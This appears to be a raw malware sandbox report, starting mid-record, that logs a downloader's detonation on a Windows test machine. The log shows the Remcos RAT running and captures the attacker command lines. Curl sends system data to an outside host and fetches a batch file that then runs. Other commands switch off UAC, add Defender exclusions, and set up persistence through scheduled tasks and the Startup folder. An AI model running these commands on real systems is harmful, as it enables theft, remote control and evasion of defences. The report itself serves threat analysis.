546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\Files\Identification-1.exe
"C:\Users\Admin\Desktop\Files\Identification-1.exe"
C:\Users\Admin\Desktop\Files\87f3f2.exe
"C:\Users\Admin\Desktop\Files\87f3f2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe
"C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"
C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp" /SL5="$30314,3849412,851968,C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\Users\Admin\Desktop\Files\onetap.exe
"C:\Users\Admin\Desktop\Files\onetap.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"
C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe
"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe"
C:\Users\Admin\Desktop\Files\Mswgoudnv.exe
"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\2DTJEUS2DTRQ" & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"
C:\Users\Admin\Desktop\Files\Mswgoudnv.exe
"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" "C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"
C:\Users\Admin\Desktop\Files\setup.exe
"C:\Users\Admin\Desktop\Files\setup.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\Files\svchost.exe
"C:\Users\Admin\Desktop\Files\svchost.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\svchost.exe'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe
"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe
